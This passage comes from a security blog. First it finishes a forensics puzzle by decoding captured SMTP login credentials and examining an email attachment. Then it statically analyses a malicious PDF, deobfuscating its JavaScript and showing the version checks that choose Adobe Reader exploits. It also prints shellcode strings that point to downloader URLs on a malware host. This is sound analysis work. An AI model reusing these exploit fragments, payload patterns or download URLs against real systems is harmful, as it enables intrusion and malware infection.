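smtp_anex itself is not shown in this post, but the decoding step is small enough to sketch in a few lines of Python.  The function below is only an illustration with a made-up name: it treats lines that start with a three-digit reply code as server lines, decodes the base64 part of the 334 challenges, and decodes every other line except the AUTH command as a base64 client answer.

```python
import base64
import re

REPLY = re.compile(r"\d{3}([ -]|$)")   # a server reply starts with a 3-digit code


def decode_auth_login(lines):
    """Return (side, text) tuples with the base64 parts of AUTH LOGIN decoded."""
    decoded = []
    for raw in lines:
        line = raw.strip()
        if line.startswith("334 "):
            # Server challenge: the text after the code is base64.
            text = base64.b64decode(line[4:]).decode("ascii")
            decoded.append(("S", "334 " + text))
        elif REPLY.match(line):
            decoded.append(("S", line))
        elif line.upper().startswith("AUTH "):
            decoded.append(("C", line))
        else:
            # Client answer to a challenge: the whole line is base64.
            decoded.append(("C", base64.b64decode(line).decode("ascii")))
    return decoded


# The exchange exactly as it appears in the capture above.
EXCHANGE = [
    "AUTH LOGIN",
    "334 VXNlcm5hbWU6",
    "c25lYWt5ZzMza0Bhb2wuY29t",
    "334 UGFzc3dvcmQ6",
    "NTU4cjAwbHo=",
    "235 AUTHENTICATION SUCCESSFUL",
]

if __name__ == "__main__":
    for side, text in decode_auth_login(EXCHANGE):
        print(side + ": " + text)
```

Since base64 is an encoding and not encryption, anyone who can see the traffic can recover the credentials this way.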

Let’s examine the second e-mail a bit closer, again using the script:

smtp_anex -r file_2 -d data_2
------------------------------------------------------------
 SMTP_ANEX (SMTP ANALYSIS AND EXTRACTION)
------------------------------------------------------------
Information from e-mail header
 Mail from:  sneakyg33k@aol.com
 Recipient:  mistersecretx@aol.com
Information from e-mail body
 Mail from:  "Ann Dercover" <sneakyg33k@aol.com>
 Mail to  :  <mistersecretx@aol.com>
 Subject  :  rendezvous
Authentication information:
 Username: sneakyg33k@aol.com
 Password: 558r00lz
Header information:
 date :  Sat, 10 Oct 2009 07
 x-mimeole :  Produced By Microsoft MimeOLE V6.00.2900.2180
 x-mailer :  Microsoft Outlook Express 6.00.2900.2180
 boundary="----=_nextpart_000_000d_01ca497c.9dec1e70" :
 content-type :  multipart/mixed;
 x-priority :  3
 x-msmail-priority :  Normal
 mime-version :  1.0
 message-id :  <001101ca49ae$e93e45b0$9f01a8c0@annlaptop>
Additional information:
 data_response: 250 OK
 msg: Attachment dumped to file - name: secretrendezvous.docx
 cmd_ehlo: HASH(0x8b3610)
 banner: 220 cia-mc07.mx.aol.com esmtp mail_cia-mc07.1; sat, 10 oct 2009 15:37:56 -0400
 auth_leftovers: 235 - AUTHENTICATION SUCCESSFUL
 data_cmd_response: 354 start mail input, end with "." on a line by itself
 header: HASH(0x8b6ec0)
------------------------------------------------------------
 The message content
------------------------------------------------------------
-------- Text --------
Hi sweetheart! Bring your fake passport and a bathing suit. Address =
attached. love, Ann
-------- HTML --------
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; =
charset=iso-8859-1">
<META content="MSHTML 6.00.2900.2853" name=GENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=#ffffff>
<DIV><FONT face=Arial size=2>Hi sweetheart! Bring your fake passport =
and a

bathing suit. Address attached. love, Ann</FONT></DIV></BODY></HTML>

Now this looks quite suspicious.  We can see from the output that Ann is again sending an e-mail, this time to mistersecretx@aol.com with the subject “rendezvous”.  The text of the message is:

Hi sweetheart! Bring your fake passport and a bathing suit. Address =
attached. love, Ann

We also see from the output of the script the following additional information:

 msg: Attachment dumped to file - name: secretrendezvous.docx

So there was an attachment with the message.  Let’s examine the content of the folder data_2:

  • 1-HTML.html
  • 1-RAW.txt
  • 1-Text.txt
  • 1-info.txt
  • 1-secretrendezvous.docx

We can therefore examine the content of the attachment. First of all, let’s calculate the MD5sum of the docx document that was attached to the e-mail.

md5sum data_2/1-secretrendezvous.docx
9e423e11db88f01bbff81172839e1923  data_2/1-secretrendezvous.docx
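
If md5sum is not available, the same checksum can be calculated with Python’s hashlib.  This is a minimal sketch with made-up function names; it reads the data in chunks so that large attachments do not have to fit in memory.

```python
import hashlib
import io


def md5_of_stream(stream, chunk_size=65536):
    """Return the hex MD5 digest of everything readable from a binary stream."""
    digest = hashlib.md5()
    for chunk in iter(lambda: stream.read(chunk_size), b""):
        digest.update(chunk)
    return digest.hexdigest()


def md5_of_file(path):
    """Return the hex MD5 digest of the file at the given path."""
    with open(path, "rb") as handle:
        return md5_of_stream(handle)


if __name__ == "__main__":
    # Demo on in-memory data; on the extracted attachment one would call
    # md5_of_file("data_2/1-secretrendezvous.docx") instead.
    print(md5_of_stream(io.BytesIO(b"abc")))
```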

Since this is a .docx document, we can use other scripts to read it, such as cat_open_xml.pl:

cat_open_xml.pl 1-secretrendezvous.docx
Meet me at the fountain near the rendezvous point. Address below. I'm bringing
all the cash.
returning from a call..

We don’t get much from this; perhaps there is more to this document than just text.  Since we know that a docx document is nothing more than a ZIP file, we can just extract the content of the document:

unzip -d doc 1-secretrendezvous.docx
Archive:  1-secretrendezvous.docx
 inflating: doc/[Content_Types].xml
 inflating: doc/_rels/.rels
 inflating: doc/word/_rels/document.xml.rels
 inflating: doc/word/document.xml
 extracting: doc/word/media/image1.png  
 inflating: doc/word/theme/theme1.xml
 inflating: doc/word/settings.xml
 inflating: doc/word/webSettings.xml
 inflating: doc/word/styles.xml
 inflating: doc/docProps/core.xml
 inflating: doc/word/numbering.xml
 inflating: doc/word/fontTable.xml
 inflating: doc/docProps/app.xml
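
Because the container is a plain ZIP archive, the embedded media can also be listed without unpacking anything.  The Python sketch below uses the standard zipfile module; the demo archive it builds is a tiny stand-in with made-up content, not the real attachment, and the function names are made up as well.

```python
import io
import zipfile


def list_media(docx_bytes):
    """Return the names of all members stored under word/media/."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as archive:
        return [name for name in archive.namelist()
                if name.startswith("word/media/")]


def build_demo_docx():
    """Build a minimal ZIP that mimics the layout of a .docx file."""
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w") as archive:
        archive.writestr("[Content_Types].xml", "<Types/>")
        archive.writestr("word/document.xml", "<document/>")
        archive.writestr("word/media/image1.png", b"\x89PNG\r\n\x1a\n")
    return buffer.getvalue()


if __name__ == "__main__":
    print(list_media(build_demo_docx()))
```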

Now we see that there is an image contained within the document.  Let’s examine it:

md5sum doc/word/media/image1.png
aadeace50997b1ba24b09ac2ef1940b7  doc/word/media/image1.png

The image seems to be taken from Google maps, displaying the meeting place.

Playa del Carmen
1. Av. Constituyentes 1 Calle 10 x la 5ta
Avenida
Playa del Carmen, 77780, Mexico
01 984 873 4000
Meeting Place

Now we know that there are strong indications that Ann’s secret lover has the e-mail address mistersecretx@aol.com (very sneaky address) and that Ann was sending him a message containing a possible meeting point (again a very subtle document called secretrendezvous).  This could very well be where she is right now (since she has already disappeared and this seems to be the only clue to her whereabouts).

The rest is up to the police chief, our job here is done…

Malware analysis

November 19th, 2009 kiddi No comments

I decided to do some malware analysis as part of a presentation I had to give.  And since I went through the process, I decided to post it here in case anyone is interested.

To begin with, I needed to find some malware to analyze.  And a great place to find live links to active malware is to visit the site: http://www.malwaredomainlist.com/mdl.php.

What I wanted to show was that having a fully patched machine with a fully updated AV is not always enough to protect you.  One way to do that is to find either a PDF or a Flash exploit.  The one that I chose for this experiment was this one:

PDF exploit to be used

First things first: download the malware sample and do some static analysis on it.  First of all I ran pdfid.py from Didier Stevens to get some identifying information about the PDF document:

pdfid.py dhkn.pdf
PDFiD 0.0.9 dhkn.pdf
 PDF Header: %PDF-1.4
 obj                    9
 endobj                 9
 stream                 2
 endstream              2
 xref                   0
 trailer                1
 startxref              1
 /Page                  0
 /Encrypt               0
 /ObjStm                0
 /JS                    1
 /JavaScript            2
 /AA                    0
 /OpenAction            0
 /AcroForm              0
 /JBIG2Decode           0
 /RichMedia             0
 /Colors > 2^24         0

By looking at this we can see that there is JavaScript code in the document, which is commonly used to exploit Adobe Reader, and we also see that there are some streams in the document.  Now we need to take a closer look at the source of the document.  This can be done with any text editor, such as vim, or just with less (or cat).

If we examine the document we don’t see any text part, just a stream that contains JavaScript:

...
endstream
endobj
6 0 obj
<</CS /DeviceRGB /S /Transparency >>
endobj
7 0 obj
<</Length 76450 /Filter [/ASCIIHexDecode]>>
stream
7661722066686e7075783d27273b6567686a76783d22223b616567777a3d35303431323b6465757....
...

This stream can be easily decoded.  We see that the filter used is a simple ASCIIHexDecode, so I simply copy the stream:

grep ^stream dhkn.pdf -A 2  > stream

I then edited the file and deleted the lines that did not belong to the stream itself.  Since the file now contained only the hex code of the stream, I could decode it with a simple Perl script:

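#!/usr/bin/perl
# Decode a file of ASCII hex digits (an ASCIIHexDecode stream) into FILE.txt

use strict;
use warnings;

my $file = shift;

die( 'Wrong usage: ' . $0 . ' FILE' ) unless defined $file and -e $file;

open( my $in, '<', $file ) or die( 'Unable to read file ' . $file );
open( my $out, '>', $file . '.txt' ) or die( 'Unable to write file ' . $file . '.txt' );
binmode( $out );

while( my $line = <$in> )
{
 print "Processing line\n";

 # keep only the hex digits; this drops the newline and any stray '%' or '>'
 $line =~ s/[^0-9a-fA-F]//g;

 # turn each pair of hex digits into one byte
 print {$out} pack( 'H*', $line );
}

close( $in );
close( $out );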

I run the script like this:

./conv.pl stream
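For comparison, the same decoding step can be sketched in Python.  This is only a sketch of the ASCIIHexDecode rules as I understand them (whitespace is ignored, '>' ends the data, an odd final digit is padded with 0); the function name ascii_hex_decode is an assumption and is not part of any tool used in this post.

```python
def ascii_hex_decode(data: str) -> bytes:
    """Decode the body of an ASCIIHexDecode stream into raw bytes."""
    digits = []
    for ch in data:
        if ch == ">":        # '>' marks the end of the hex data
            break
        if ch.isspace():     # whitespace between digits is ignored
            continue
        digits.append(ch)
    if len(digits) % 2:      # an odd final digit is padded with 0
        digits.append("0")
    return bytes.fromhex("".join(digits))


if __name__ == "__main__":
    # The first bytes of the stream shown in the PDF source above.
    print(ascii_hex_decode("7661722066686e7075783d27273b"))
```

Run on the first few bytes of the stream it prints b"var fhnpux='';", which matches the start of the decoded text.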

The content of the text file stream.txt looks something like this

var fhnpux='';eghjvx="";aegwz=50412;deuv="";var fiqy='',lmuz=false,ekrt=true,gpqr=false,
hnrty='',hloqr=0,dimtz=String,afioxy=dimtz['fkrEoAmkCBhkaBrRCAoAdkeE'.replace(/[EABkR]/g,'')],
gilmq=String,abdmv=gilmq['eBvBaLlI'.replace(/[ILABJ]/g,'')],ikmqw="61",begily="",aefmos=[67,59,
63,151,171,159,153,165,159,160,164,81,156,154,174,144,159,165,94,170,151,163,169,161,98,81,162,...
...

Obviously this is obfuscated JavaScript, so we need to dig a little deeper.  To make it easier to read, a simple substitution puts every statement on its own line:

cat stream.txt | sed -e 's/;/;\n/g' > stream.js

This makes the code a little bit easier to read.  To make it even easier, vim is used to edit the file and add spaces and new lines where needed.  There are two things in this code that are interesting (well, the two most interesting things that pop up at least).  First of all the function close to the end of the file:

lquv=function()
{
      for(var fjpu;hloqr<aefmos.length;hloqr+=1)
      {
                var fjqu=hloqr%ikmqw.length+1;
                var dorvy=ikmqw.substring(hloqr%ikmqw.length,fjqu);
                var blrwy=aefmos[hloqr];
                begily+=afioxy(blrwy-dorvy.charCodeAt(0));
        }
        abdmv(begily);
};
lquv();

We see that we have a function called “lquv” which seems to take care of decoding the obfuscated code.  At the end of it a function called “abdmv” is called with the parameter begily, which is the variable that holds the decoded JavaScript.  The function “abdmv” is defined above in the code:

gilmq=String
abdmv=gilmq['eBvBaLlI'.replace(/[ILABJ]/g,'')]

This is a very simple obfuscation.  We see that “gilmq” is set to String, and the replace call strips the padding characters from 'eBvBaLlI', so “abdmv” becomes (when we complete the simple substitution)

gilmq['eval']
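The padding trick is easy to check by hand.  The short Python sketch below mimics the JavaScript replace call on the two padded names that appear in the decoded stream; the helper name strip_padding is an assumption made for this illustration.

```python
import re


def strip_padding(padded: str, junk: str) -> str:
    """Mimic JavaScript's padded.replace(/[junk]/g, '')."""
    return re.sub("[" + re.escape(junk) + "]", "", padded)


if __name__ == "__main__":
    # The name behind abdmv
    print(strip_padding("eBvBaLlI", "ILABJ"))
    # The name behind afioxy
    print(strip_padding("fkrEoAmkCBhkaBrRCAoAdkeE", "EABkR"))
```

The first call gives eval and the second gives fromCharCode, so “afioxy” is String.fromCharCode, the function the decoding loop uses to turn numbers back into characters.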

So when the function calls “abdmv(begily)” it is about to evaluate, that is execute, the code that is stored in the variable begily.  We therefore need to know what is inside the variable “begily”.  It is built from the variable “aefmos” (the second interesting thing we found), which is defined as:

aefmos=[67,59,6....

The easiest way (or at least an easy method) to decode this array is simply to turn stream.js into an HTML document and open it up in a browser or another JavaScript interpreter.

We add to the top of the document

<html>
<head><title>TESTING</title></head>
<body>
<script>

And at the bottom

</script>
</body>
</html>

We then modify the JavaScript itself.  First of all the document ends with a ?, which we delete.  Then we modify the function "lquv" so that it prints the JavaScript instead of evaluating it.

lquv=function()
{
 for(var fjpu; hloqr<aefmos.length;hloqr+=1)
 {
 var fjqu=hloqr%ikmqw.length+1;
 var dorvy=ikmqw.substring(hloqr%ikmqw.length,fjqu);
 var blrwy=aefmos[hloqr];
 begily+=afioxy(blrwy-dorvy.charCodeAt(0));
 }
 //abdmv(begily);
 document.write(begily);
};

The change that I made is at the end of the function: the call to abdmv is commented out and a document.write call is added.  I then open this document up in a sandboxed environment to get the variable begily decoded.  The decoded script starts like this:

function fix_it(yarsp, len)
{
 while (yarsp.length * 2 < len)
 {
 yarsp += yarsp;
 }

 yarsp = yarsp.substring(0, len/2);
...
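The decoding loop can also be reproduced without running any of the malicious JavaScript.  The Python sketch below is an illustration under that assumption: it subtracts the character codes of the repeating key ikmqw ("61") from the numbers in aefmos, just as lquv does.  Only the first values of the array that are visible in the listing are used, and the function name decode is hypothetical.

```python
def decode(values, key):
    """Subtract the repeating key's character codes from the values."""
    chars = []
    for index, value in enumerate(values):
        key_char = key[index % len(key)]
        chars.append(chr(value - ord(key_char)))
    return "".join(chars)


if __name__ == "__main__":
    # Only the first values of aefmos that are visible in the listing.
    aefmos_prefix = [67, 59, 63, 151, 171, 159, 153, 165, 159, 160, 164, 81,
                     156, 154, 174, 144, 159, 165, 94, 170, 151, 163, 169, 161,
                     98, 81, 162]
    print(repr(decode(aefmos_prefix, "61")))
```

The result starts with a line break and a tab followed by "function fix_it(yarsp, l", which agrees with the beginning of the script shown above.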

Now we have the true JavaScript code that is to be run on the machine.  Inside it there are several functions, some of which contain the telling variable names “shellcode” or “payload”, which is usually considered an indication of malware (if the obfuscation isn’t enough).  Near the end of the code we see this:

function pdf_start()
{
 var version = app.viewerVersion.toString();
 version = version.replace(/\D/g,'');
 var varsion_array = new Array(version.charAt(0), version.charAt(1), \
version.charAt(2));

 if ((varsion_array[0] == 8 ) && (varsion_array[1] == 0) || \
(varsion_array[1] == 1 && varsion_array[2] < 3))
 {
 util_printf();
 }

 if ((varsion_array[0] < 8 ) || (varsion_array[0] == 8 && \
varsion_array[1] < 2 && varsion_array[2] < 2))
 {
 collab_email();
 }

 if ((varsion_array[0] < 9 ) || (varsion_array[0] == 9 && \
varsion_array[1] < 1))
 {
 collab_geticon();
 }
}

pdf_start();

This function is called at the end, and we can see that it begins by getting the Adobe Reader version number before going through a series of if statements that determine which exploit to use based on that version.  The exploits are used against the following Adobe Reader versions:

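  • util_printf: 8.0.x, or x.1.0-x.1.2 (presumably meant as 8.1.0-8.1.2, but the second half of the condition does not check the major version)
  • collab_email: versions older than 8.0, or 8.0.0-8.0.1 and 8.1.0-8.1.1
  • collab_geticon: versions older than 9.0, or 9.0.x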
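The conditions in pdf_start can be replayed outside Adobe Reader to see which exploits a given version would trigger.  The Python sketch below mirrors the three if statements, including their operator precedence.  The function names and the plain version strings used as input are assumptions for illustration, and missing digits are treated as 0, which is how the JavaScript comparisons behave for an empty string.

```python
def version_digits(version: str):
    """Return the first three digits of a version string, padded with zeros."""
    digits = [int(ch) for ch in version if ch.isdigit()][:3]
    return digits + [0] * (3 - len(digits))


def select_exploits(version: str):
    """List the exploit functions pdf_start would call for this version."""
    major, minor, patch = version_digits(version)
    selected = []
    # Same precedence as the JavaScript: (a && b) || (c && d).
    if (major == 8 and minor == 0) or (minor == 1 and patch < 3):
        selected.append("util_printf")
    if major < 8 or (major == 8 and minor < 2 and patch < 2):
        selected.append("collab_email")
    if major < 9 or (major == 9 and minor < 1):
        selected.append("collab_geticon")
    return selected


if __name__ == "__main__":
    for version in ("7.0.9", "8.0.0", "8.1.2", "9.0", "9.1.0"):
        print(version, select_exploits(version))
```

Note that more than one exploit can fire for the same version, since the three checks are independent if statements rather than an if/else chain.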

A different exploit is run for each of the criteria listed above.  If we examine the payloads or shellcodes, we see that they are encoded as %u escape sequences, decoded with the JavaScript function “unescape”, and are all similar to the one listed below:

var payload = unescape("%uEBE9%u0001%u5600%uA164%u0030%u0....

To further analyse this malware the payload has to be examined.  So we copy the payload to a file and create a simple Perl script to convert the escaped JavaScript string to binary:

#!/usr/bin/perl
# Convert the %uXXXX escapes found in FILE to raw bytes, written to FILE.dat
use strict;
use warnings;

my $file = shift;
my @chars;

die('file does not exist') unless defined $file and -e $file;

open( FH, '<', $file ) or die( 'Unable to open file: ' . $file );
open( RW, '>', $file . '.dat' ) or die( 'Unable to write file: ' . $file . '.dat' );
binmode RW;

# read all lines
while( my $line = <FH> )
{
 # collect the four hex digits of every %uXXXX escape on the line
 @chars = $line =~ /%u([0-9A-Fa-f]{4})/g;
 print "Processing line..\n";
 print "LINE CONSISTS OF " . scalar( @chars ) . " CHARS\n";

 foreach my $char ( @chars )
 {
  # 'v' writes the 16-bit value in little-endian byte order
  print RW pack( 'v', hex( $char ) );
 }
}

close( RW );
close( FH );

To run the script:

./decode_shell shell
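The conversion itself is small enough to sketch in Python as well.  The sketch assumes the payload uses only %uXXXX escapes, each holding one 16-bit value that is written out in little-endian byte order; the function name unescape_to_bytes is hypothetical.

```python
import re
import struct


def unescape_to_bytes(text: str) -> bytes:
    """Turn every %uXXXX escape in the text into two little-endian bytes."""
    words = re.findall(r"%u([0-9A-Fa-f]{4})", text)
    return b"".join(struct.pack("<H", int(word, 16)) for word in words)


if __name__ == "__main__":
    # The visible start of the payload shown above.
    prefix = 'var payload = unescape("%uEBE9%u0001%u5600%uA164%u0030'
    print(unescape_to_bytes(prefix).hex())
```

For the visible start of the payload this prints e9eb0100005664a13000, so each pair of bytes is swapped relative to the order in which it appears in the escape.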

Now I’ve got a binary file, called shell.dat, which can be easily analysed using strings:

strings -a -t x shell.dat
36 QQSVW`
65 B`;U
1a8 PhhC
1d5 PSSSSSS
1f3 QQSVWjB
209 a.ex
229 YYt9
243 YYt
 W
264 YYFF;
274 QSf`
2a1 t
 @8
2ba http://style-boards.com/forum/bmosz2.exe
2e3 http://style-boards.com/forum/click.php?r=

We see that this particular shellcode (the one that is used to exploit version 9.0) simply downloads more malware to the machine.  Two files are fetched, both of which had been removed from the server in question at the time of analysis, so further analysis wasn’t possible.
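When there are several payloads to go through, pulling out only the URLs saves some reading.  The Python sketch below is a rough stand-in for strings, not a reimplementation of it: it finds runs of printable ASCII and keeps those that look like URLs.  The function names and the sample bytes (including the example.invalid host) are made up for illustration.

```python
import re


def ascii_strings(data: bytes, min_len: int = 4):
    """Return (offset, text) for each run of printable ASCII of at least min_len."""
    pattern = re.compile(rb"[\x20-\x7e]{" + str(min_len).encode("ascii") + rb",}")
    return [(m.start(), m.group().decode("ascii")) for m in pattern.finditer(data)]


def urls(data: bytes):
    """Keep only the strings that start like a URL."""
    return [text for _, text in ascii_strings(data)
            if text.startswith(("http://", "https://"))]


if __name__ == "__main__":
    # Hypothetical bytes standing in for a decoded payload file.
    sample = b"\x00\x01http://example.invalid/a.exe\x00ab\x00"
    for offset, text in ascii_strings(sample):
        print(f"{offset:x} {text}")
    print(urls(sample))
```

To use it on a decoded payload, read the .dat file in binary mode and pass the bytes to urls.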

To test the other payloads, we examine the one that exploits the util_printf vulnerability.

./decode_shell util_shell
Processing line..
LINE CONSISTS OF 391 CHARS
strings -a -t x util_shell.dat
...
209 a.ex
...
2ba http://style-boards.com/forum/cdruz2.exe
2e3 http://style-boards.com/forum/click.php?r=

And the collab_email exploit:

./decode_shell collab_email_shell
Processing line..
LINE CONSISTS OF 392 CHARS
strings -a -t x collab_email_shell.dat
...
209 a.ex
...
2ba http://style-boards.com/forum/fkntuw2.exe
2e4 http://style-boards.com/forum/click.php?r=

We can see that each of the exploits downloads two executable files.  The file that comes from “click.php?r=” seems to be the same one for each of them, while the other executable has a different name each time: fkntuw2.exe, cdruz2.exe and bmosz2.exe.

I was unable to analyze the executables further since they had all been removed from the server by the time I tried to download them (I got a 404 error from the server), although the PDF document still remained on the server the last time I checked.

This concludes the static analysis of the code.  I also did a live dynamic analysis of the malware that I might share at a later time, but for now, let the static analysis do.
